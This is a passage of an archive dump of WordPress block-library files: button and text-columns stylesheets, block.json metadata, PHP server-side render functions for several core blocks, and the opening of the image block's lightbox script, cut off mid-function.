.5em)*.25)}.wp-block-buttons>.wp-block-button.wp-block-button__width-100{flex-basis:100%;width:100%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{width:25%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{width:50%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{width:75%}.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}:root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){border:2px solid;padding:.667em 1.333em}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){color:currentColor}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){background-color:initial;background-image:none}button/style-rtl.min.css000060400000004241151330427370011314 0ustar00.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-button.wp-block-button__width-25{width:calc(25% - var(--wp--style--block-gap, .5em)*.75)}.wp-block-buttons>.wp-block-button.wp-block-button__width-50{width:calc(50% - var(--wp--style--block-gap, .5em)*.5)}.wp-block-buttons>.wp-block-button.wp-block-button__width-75{width:calc(75% - var(--wp--style--block-gap, .5em)*.25)}.wp-block-buttons>.wp-block-button.wp-block-button__width-100{flex-basis:100%;width:100%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{width:25%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{width:50%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{width:75%}.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}:root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){border:2px solid;padding:.667em 1.333em}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){color:currentColor}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){background-color:initial;background-image:none}button/editor-rtl.css000060400000001150151330427370010654 0ustar00.wp-block[data-align=center]>.wp-block-button{
  margin-left:auto;
  margin-right:auto;
  text-align:center;
}

.wp-block[data-align=right]>.wp-block-button{
  text-align:right;
}

.wp-block-button{
  cursor:text;
  position:relative;
}
.wp-block-button:focus{
  box-shadow:0 0 0 1px #fff, 0 0 0 3px var(--wp-admin-theme-color);
  outline:2px solid #0000;
  outline-offset:-2px;
}
.wp-block-button[data-rich-text-placeholder]:after{
  opacity:.8;
}

div[data-type="core/button"]{
  display:table;
}

.editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{
  text-decoration:inherit;
}button/block.json000060400000005532151330427370010052 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/button",
	"title": "Button",
	"category": "design",
	"parent": [ "core/buttons" ],
	"description": "Prompt visitors to take action with a button-style link.",
	"keywords": [ "link" ],
	"textdomain": "default",
	"attributes": {
		"tagName": {
			"type": "string",
			"enum": [ "a", "button" ],
			"default": "a"
		},
		"type": {
			"type": "string",
			"default": "button"
		},
		"textAlign": {
			"type": "string"
		},
		"url": {
			"type": "string",
			"source": "attribute",
			"selector": "a",
			"attribute": "href",
			"__experimentalRole": "content"
		},
		"title": {
			"type": "string",
			"source": "attribute",
			"selector": "a,button",
			"attribute": "title",
			"__experimentalRole": "content"
		},
		"text": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "a,button",
			"__experimentalRole": "content"
		},
		"linkTarget": {
			"type": "string",
			"source": "attribute",
			"selector": "a",
			"attribute": "target",
			"__experimentalRole": "content"
		},
		"rel": {
			"type": "string",
			"source": "attribute",
			"selector": "a",
			"attribute": "rel",
			"__experimentalRole": "content"
		},
		"placeholder": {
			"type": "string"
		},
		"backgroundColor": {
			"type": "string"
		},
		"textColor": {
			"type": "string"
		},
		"gradient": {
			"type": "string"
		},
		"width": {
			"type": "number"
		}
	},
	"supports": {
		"anchor": true,
		"splitting": true,
		"align": false,
		"alignWide": false,
		"color": {
			"__experimentalSkipSerialization": true,
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"reusable": false,
		"shadow": {
			"__experimentalSkipSerialization": true
		},
		"spacing": {
			"__experimentalSkipSerialization": true,
			"padding": [ "horizontal", "vertical" ],
			"__experimentalDefaultControls": {
				"padding": true
			}
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"style": true,
			"width": true,
			"__experimentalSkipSerialization": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"style": true,
				"width": true
			}
		},
		"__experimentalSelector": ".wp-block-button .wp-block-button__link",
		"interactivity": {
			"clientNavigation": true
		}
	},
	"styles": [
		{ "name": "fill", "label": "Fill", "isDefault": true },
		{ "name": "outline", "label": "Outline" }
	],
	"editorStyle": "wp-block-button-editor",
	"style": "wp-block-button"
}
button/style.css000060400000004476151330427370007745 0ustar00.wp-block-button__link{
  box-sizing:border-box;
  cursor:pointer;
  display:inline-block;
  text-align:center;
  word-break:break-word;
}
.wp-block-button__link.aligncenter{
  text-align:center;
}
.wp-block-button__link.alignright{
  text-align:right;
}

:where(.wp-block-button__link){
  border-radius:9999px;
  box-shadow:none;
  padding:calc(.667em + 2px) calc(1.333em + 2px);
  text-decoration:none;
}

.wp-block-button[style*=text-decoration] .wp-block-button__link{
  text-decoration:inherit;
}

.wp-block-buttons>.wp-block-button.has-custom-width{
  max-width:none;
}
.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{
  width:100%;
}
.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{
  font-size:inherit;
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-25{
  width:calc(25% - var(--wp--style--block-gap, .5em)*.75);
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-50{
  width:calc(50% - var(--wp--style--block-gap, .5em)*.5);
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-75{
  width:calc(75% - var(--wp--style--block-gap, .5em)*.25);
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-100{
  flex-basis:100%;
  width:100%;
}

.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{
  width:25%;
}
.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{
  width:50%;
}
.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{
  width:75%;
}

.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{
  border-radius:0;
}

.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{
  border-radius:0 !important;
}

:root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){
  border:2px solid;
  padding:.667em 1.333em;
}
:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){
  color:currentColor;
}
:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){
  background-color:initial;
  background-image:none;
}page-list-item.php000060400000000551151330427370010100 0ustar00<?php
/**
 * Server-side rendering of the `core/page-list-item` block.
 *
 * @package WordPress
 */

/**
 * Registers the `core/page-list-item` block on server.
 *
 * @since 6.3.0
 */
function register_block_core_page_list_item() {
	register_block_type_from_metadata( __DIR__ . '/page-list-item' );
}
add_action( 'init', 'register_block_core_page_list_item' );
text-columns/editor-rtl.min.css000060400000000126151330427370012567 0ustar00.wp-block-text-columns .block-editor-rich-text__editable:focus{outline:1px solid #ddd}text-columns/editor-rtl.css000060400000000133151330427370012003 0ustar00.wp-block-text-columns .block-editor-rich-text__editable:focus{
  outline:1px solid #ddd;
}text-columns/block.json000060400000001420151330427370011171 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/text-columns",
	"title": "Text Columns (deprecated)",
	"icon": "columns",
	"category": "design",
	"description": "This block is deprecated. Please use the Columns block instead.",
	"textdomain": "default",
	"attributes": {
		"content": {
			"type": "array",
			"source": "query",
			"selector": "p",
			"query": {
				"children": {
					"type": "string",
					"source": "html"
				}
			},
			"default": [ {}, {} ]
		},
		"columns": {
			"type": "number",
			"default": 2
		},
		"width": {
			"type": "string"
		}
	},
	"supports": {
		"inserter": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-text-columns-editor",
	"style": "wp-block-text-columns"
}
text-columns/style-rtl.css000060400000000760151330427370011663 0ustar00.wp-block-text-columns,.wp-block-text-columns.aligncenter{
  display:flex;
}
.wp-block-text-columns .wp-block-column{
  margin:0 1em;
  padding:0;
}
.wp-block-text-columns .wp-block-column:first-child{
  margin-right:0;
}
.wp-block-text-columns .wp-block-column:last-child{
  margin-left:0;
}
.wp-block-text-columns.columns-2 .wp-block-column{
  width:50%;
}
.wp-block-text-columns.columns-3 .wp-block-column{
  width:33.33333%;
}
.wp-block-text-columns.columns-4 .wp-block-column{
  width:25%;
}text-columns/style.css000060400000000760151330427370011064 0ustar00.wp-block-text-columns,.wp-block-text-columns.aligncenter{
  display:flex;
}
.wp-block-text-columns .wp-block-column{
  margin:0 1em;
  padding:0;
}
.wp-block-text-columns .wp-block-column:first-child{
  margin-left:0;
}
.wp-block-text-columns .wp-block-column:last-child{
  margin-right:0;
}
.wp-block-text-columns.columns-2 .wp-block-column{
  width:50%;
}
.wp-block-text-columns.columns-3 .wp-block-column{
  width:33.33333%;
}
.wp-block-text-columns.columns-4 .wp-block-column{
  width:25%;
}text-columns/style.min.css000060400000000704151330427370011644 0ustar00.wp-block-text-columns,.wp-block-text-columns.aligncenter{display:flex}.wp-block-text-columns .wp-block-column{margin:0 1em;padding:0}.wp-block-text-columns .wp-block-column:first-child{margin-left:0}.wp-block-text-columns .wp-block-column:last-child{margin-right:0}.wp-block-text-columns.columns-2 .wp-block-column{width:50%}.wp-block-text-columns.columns-3 .wp-block-column{width:33.33333%}.wp-block-text-columns.columns-4 .wp-block-column{width:25%}text-columns/editor.min.css000060400000000126151330427370011770 0ustar00.wp-block-text-columns .block-editor-rich-text__editable:focus{outline:1px solid #ddd}text-columns/editor.css000060400000000133151330427370011204 0ustar00.wp-block-text-columns .block-editor-rich-text__editable:focus{
  outline:1px solid #ddd;
}text-columns/style-rtl.min.css000060400000000704151330427370012443 0ustar00.wp-block-text-columns,.wp-block-text-columns.aligncenter{display:flex}.wp-block-text-columns .wp-block-column{margin:0 1em;padding:0}.wp-block-text-columns .wp-block-column:first-child{margin-right:0}.wp-block-text-columns .wp-block-column:last-child{margin-left:0}.wp-block-text-columns.columns-2 .wp-block-column{width:50%}.wp-block-text-columns.columns-3 .wp-block-column{width:33.33333%}.wp-block-text-columns.columns-4 .wp-block-column{width:25%}site-tagline.php000060400000002263151330427370007646 0ustar00<?php
/**
 * Server-side rendering of the `core/site-tagline` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/site-tagline` block on the server.
 *
 * @since 5.8.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string The render.
 */
function render_block_core_site_tagline( $attributes ) {
	$site_tagline = get_bloginfo( 'description' );
	if ( ! $site_tagline ) {
		return;
	}

	$tag_name           = 'p';
	$align_class_name   = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}";
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $align_class_name ) );

	if ( isset( $attributes['level'] ) && 0 !== $attributes['level'] ) {
		$tag_name = 'h' . (int) $attributes['level'];
	}

	return sprintf(
		'<%1$s %2$s>%3$s</%1$s>',
		$tag_name,
		$wrapper_attributes,
		$site_tagline
	);
}

/**
 * Registers the `core/site-tagline` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_site_tagline() {
	register_block_type_from_metadata(
		__DIR__ . '/site-tagline',
		array(
			'render_callback' => 'render_block_core_site_tagline',
		)
	);
}

add_action( 'init', 'register_block_core_site_tagline' );
post-author-name.php000060400000003436151330427370010467 0ustar00<?php
/**
 * Server-side rendering of the `core/post-author-name` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-author-name` block on the server.
 *
 * @since 6.2.0
 *
 * @param  array    $attributes Block attributes.
 * @param  string   $content    Block default content.
 * @param  WP_Block $block      Block instance.
 * @return string Returns the rendered post author name block.
 */
function render_block_core_post_author_name( $attributes, $content, $block ) {
	if ( isset( $block->context['postId'] ) ) {
		$author_id = get_post_field( 'post_author', $block->context['postId'] );
	} else {
		$author_id = get_query_var( 'author' );
	}

	if ( empty( $author_id ) ) {
		return '';
	}

	$author_name = get_the_author_meta( 'display_name', $author_id );
	if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) {
		$author_name = sprintf( '<a href="%1$s" target="%2$s" class="wp-block-post-author-name__link">%3$s</a>', get_author_posts_url( $author_id ), esc_attr( $attributes['linkTarget'] ), $author_name );
	}

	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return sprintf( '<div %1$s>%2$s</div>', $wrapper_attributes, $author_name );
}

/**
 * Registers the `core/post-author-name` block on the server.
 *
 * @since 6.2.0
 */
function register_block_core_post_author_name() {
	register_block_type_from_metadata(
		__DIR__ . '/post-author-name',
		array(
			'render_callback' => 'render_block_core_post_author_name',
		)
	);
}
add_action( 'init', 'register_block_core_post_author_name' );
block/block.json000060400000001113151330427370007620 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/block",
	"title": "Pattern",
	"category": "reusable",
	"description": "Reuse this design across your site.",
	"keywords": [ "reusable" ],
	"textdomain": "default",
	"attributes": {
		"ref": {
			"type": "number"
		},
		"content": {
			"type": "object",
			"default": {}
		}
	},
	"providesContext": {
		"pattern/overrides": "content"
	},
	"supports": {
		"customClassName": false,
		"html": false,
		"inserter": false,
		"renaming": false,
		"interactivity": {
			"clientNavigation": true
		}
	}
}
query-total.php000064400000004747151330427370007564 0ustar00<?php
/**
 * Server-side rendering of the `core/query-total` block.
 *
 * @package WordPress
 */

/**
 * Renders the `query-total` block on the server.
 *
 * @since 6.8.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string The rendered block content.
 */
function render_block_core_query_total( $attributes, $content, $block ) {
	global $wp_query;
	$wrapper_attributes = get_block_wrapper_attributes();
	if ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] ) {
		$query_to_use = $wp_query;
		$current_page = max( 1, (int) get_query_var( 'paged', 1 ) );
	} else {
		$page_key     = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page';
		$current_page = isset( $_GET[ $page_key ] ) ? (int) $_GET[ $page_key ] : 1;
		$query_to_use = new WP_Query( build_query_vars_from_query_block( $block, $current_page ) );
	}

	$max_rows       = $query_to_use->found_posts;
	$posts_per_page = (int) $query_to_use->get( 'posts_per_page' );

	// Calculate the range of posts being displayed.
	$start = ( 0 === $max_rows ) ? 0 : ( ( $current_page - 1 ) * $posts_per_page + 1 );
	$end   = min( $start + $posts_per_page - 1, $max_rows );

	// Prepare the display based on the `displayType` attribute.
	$output = '';
	switch ( $attributes['displayType'] ) {
		case 'range-display':
			if ( $start === $end ) {
				$output = sprintf(
					/* translators: 1: Start index of posts, 2: Total number of posts */
					__( 'Displaying %1$s of %2$s' ),
					$start,
					$max_rows
				);
			} else {
				$output = sprintf(
					/* translators: 1: Start index of posts, 2: End index of posts, 3: Total number of posts */
					__( 'Displaying %1$s – %2$s of %3$s' ),
					$start,
					$end,
					$max_rows
				);
			}

			break;

		case 'total-results':
		default:
			// translators: %d: number of results.
			$output = sprintf( _n( '%d result found', '%d results found', $max_rows ), $max_rows );
			break;
	}

	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$output
	);
}

/**
 * Registers the `query-total` block.
 *
 * @since 6.8.0
 */
function register_block_core_query_total() {
	register_block_type_from_metadata(
		__DIR__ . '/query-total',
		array(
			'render_callback' => 'render_block_core_query_total',
		)
	);
}
add_action( 'init', 'register_block_core_query_total' );
comment-date.php000060400000003142151330427370007633 0ustar00<?php
/**
 * Server-side rendering of the `core/comment-date` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comment-date` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Return the post comment's date.
 */
function render_block_core_comment_date( $attributes, $content, $block ) {
	if ( ! isset( $block->context['commentId'] ) ) {
		return '';
	}

	$comment = get_comment( $block->context['commentId'] );
	if ( empty( $comment ) ) {
		return '';
	}

	$classes = ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) ? 'has-link-color' : '';

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) );
	$formatted_date     = get_comment_date(
		isset( $attributes['format'] ) ? $attributes['format'] : '',
		$comment
	);
	$link               = get_comment_link( $comment );

	if ( ! empty( $attributes['isLink'] ) ) {
		$formatted_date = sprintf( '<a href="%1s">%2s</a>', esc_url( $link ), $formatted_date );
	}

	return sprintf(
		'<div %1$s><time datetime="%2$s">%3$s</time></div>',
		$wrapper_attributes,
		esc_attr( get_comment_date( 'c', $comment ) ),
		$formatted_date
	);
}

/**
 * Registers the `core/comment-date` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comment_date() {
	register_block_type_from_metadata(
		__DIR__ . '/comment-date',
		array(
			'render_callback' => 'render_block_core_comment_date',
		)
	);
}
add_action( 'init', 'register_block_core_comment_date' );
image/style-rtl.min.css000060400000014340151330427370011064 0ustar00.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{border-radius:inherit}.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{display:table}.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{caption-side:bottom;display:table-caption}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-image.is-style-circle-mask img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}:root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){border-radius:9999px}.wp-block-image figure{margin:0}.wp-lightbox-container{display:flex;flex-direction:column;position:relative}.wp-lightbox-container img{cursor:zoom-in}.wp-lightbox-container img:hover+button{opacity:1}.wp-lightbox-container button{align-items:center;-webkit-backdrop-filter:blur(16px) saturate(180%);backdrop-filter:blur(16px) saturate(180%);background-color:#5a5a5a40;border:none;border-radius:4px;cursor:zoom-in;display:flex;height:20px;justify-content:center;left:16px;opacity:0;padding:0;position:absolute;text-align:center;top:16px;transition:opacity .2s ease;width:20px;z-index:100}.wp-lightbox-container button:focus-visible{outline:3px auto #5a5a5a40;outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:pointer;opacity:1}.wp-lightbox-container button:focus{opacity:1}.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){background-color:#5a5a5a40;border:none}.wp-lightbox-overlay{box-sizing:border-box;cursor:zoom-out;height:100vh;overflow:hidden;position:fixed;right:0;top:0;visibility:hidden;width:100%;z-index:100000}.wp-lightbox-overlay .close-button{align-items:center;cursor:pointer;display:flex;justify-content:center;left:calc(env(safe-area-inset-left) + 16px);min-height:40px;min-width:40px;padding:0;position:absolute;top:calc(env(safe-area-inset-top) + 16px);z-index:5000000}.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){background:none;border:none}.wp-lightbox-overlay .lightbox-image-container{height:var(--wp--lightbox-container-height);overflow:hidden;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);transform-origin:top right;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:100% 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{height:var(--wp--lightbox-image-height);min-height:var(--wp--lightbox-image-height);min-width:var(--wp--lightbox-image-width);width:var(--wp--lightbox-image-width)}.wp-lightbox-overlay .wp-block-image figcaption{display:none}.wp-lightbox-overlay button{background:none;border:none}.wp-lightbox-overlay .scrim{background-color:#fff;height:100%;opacity:.9;position:absolute;width:100%;z-index:2000000}.wp-lightbox-overlay.active{animation:turn-on-visibility .25s both;visibility:visible}.wp-lightbox-overlay.active img{animation:turn-on-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active){animation:turn-off-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active) img{animation:turn-off-visibility .25s both}@media (prefers-reduced-motion:no-preference){.wp-lightbox-overlay.zoom.active{animation:none;opacity:1;visibility:visible}.wp-lightbox-overlay.zoom.active .lightbox-image-container{animation:lightbox-zoom-in .4s}.wp-lightbox-overlay.zoom.active .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active){animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{animation:turn-off-visibility .4s forwards}}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom-in{0%{transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale))}to{transform:translate(50%,-50%) scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}image/theme-rtl.css000060400000000324151330427370010241 0ustar00:root :where(.wp-block-image figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme :root :where(.wp-block-image figcaption){
  color:#ffffffa6;
}

.wp-block-image{
  margin:0 0 1em;
}image/view.js000060400000041332151330427370007142 0ustar00import * as __WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__ from "@wordpress/interactivity";
/******/ // The require scope
/******/ var __webpack_require__ = {};
/******/ 
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ 	// define getter functions for harmony exports
/******/ 	__webpack_require__.d = (exports, definition) => {
/******/ 		for(var key in definition) {
/******/ 			if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ 				Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ 			}
/******/ 		}
/******/ 	};
/******/ })();
/******/ 
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ 	__webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/ 
/************************************************************************/
var __webpack_exports__ = {};

;// CONCATENATED MODULE: external "@wordpress/interactivity"
var x = (y) => {
	var x = {}; __webpack_require__.d(x, y); return x
} 
var y = (x) => (() => (x))
const interactivity_namespaceObject = x({ ["getContext"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getContext), ["getElement"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getElement), ["store"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.store) });
;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/image/view.js
/**
 * WordPress dependencies
 */


/**
 * Tracks whether user is touching screen; used to differentiate behavior for
 * touch and mouse input.
 *
 * @type {boolean}
 */
let isTouching = false;

/**
 * Tracks the last time the screen was touched; used to differentiate behavior
 * for touch and mouse input.
 *
 * @type {number}
 */
let lastTouchTime = 0;

/**
 * Stores the image reference of the currently opened lightbox.
 *
 * @type {HTMLElement}
 */
let imageRef;

/**
 * Stores the button reference of the currently opened lightbox.
 *
 * @type {HTMLElement}
 */
let buttonRef;
const {
  state,
  actions,
  callbacks
} = (0,interactivity_namespaceObject.store)('core/image', {
  state: {
    currentImage: {},
    get overlayOpened() {
      return state.currentImage.currentSrc;
    },
    get roleAttribute() {
      return state.overlayOpened ? 'dialog' : null;
    },
    get ariaModal() {
      return state.overlayOpened ? 'true' : null;
    },
    get enlargedSrc() {
      return state.currentImage.uploadedSrc || 'data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=';
    },
    get imgStyles() {
      return state.overlayOpened && `${state.currentImage.imgStyles?.replace(/;$/, '')}; object-fit:cover;`;
    }
  },
  actions: {
    showLightbox() {
      const ctx = (0,interactivity_namespaceObject.getContext)();

      // Bails out if the image has not loaded yet.
      if (!ctx.imageRef?.complete) {
        return;
      }

      // Stores the positons of the scroll to fix it until the overlay is
      // closed.
      state.scrollTopReset = document.documentElement.scrollTop;
      state.scrollLeftReset = document.documentElement.scrollLeft;

      // Moves the information of the expaned image to the state.
      ctx.currentSrc = ctx.imageRef.currentSrc;
      imageRef = ctx.imageRef;
      buttonRef = ctx.buttonRef;
      state.currentImage = ctx;
      state.overlayEnabled = true;

      // Computes the styles of the overlay for the animation.
      callbacks.setOverlayStyles();
    },
    hideLightbox() {
      if (state.overlayEnabled) {
        // Waits until the close animation has completed before allowing a
        // user to scroll again. The duration of this animation is defined in
        // the `styles.scss` file, but in any case we should wait a few
        // milliseconds longer than the duration, otherwise a user may scroll
        // too soon and cause the animation to look sloppy.
        setTimeout(function () {
          // Delays before changing the focus. Otherwise the focus ring will
          // appear on Firefox before the image has finished animating, which
          // looks broken.
          buttonRef.focus({
            preventScroll: true
          });

          // Resets the current image to mark the overlay as closed.
          state.currentImage = {};
          imageRef = null;
          buttonRef = null;
        }, 450);

        // Starts the overlay closing animation. The showClosingAnimation
        // class is used to avoid showing it on page load.
        state.showClosingAnimation = true;
        state.overlayEnabled = false;
      }
    },
    handleKeydown(event) {
      if (state.overlayEnabled) {
        // Focuses the close button when the user presses the tab key.
        if (event.key === 'Tab') {
          event.preventDefault();
          const {
            ref
          } = (0,interactivity_namespaceObject.getElement)();
          ref.querySelector('button').focus();
        }
        // Closes the lightbox when the user presses the escape key.
        if (event.key === 'Escape') {
          actions.hideLightbox();
        }
      }
    },
    handleTouchMove(event) {
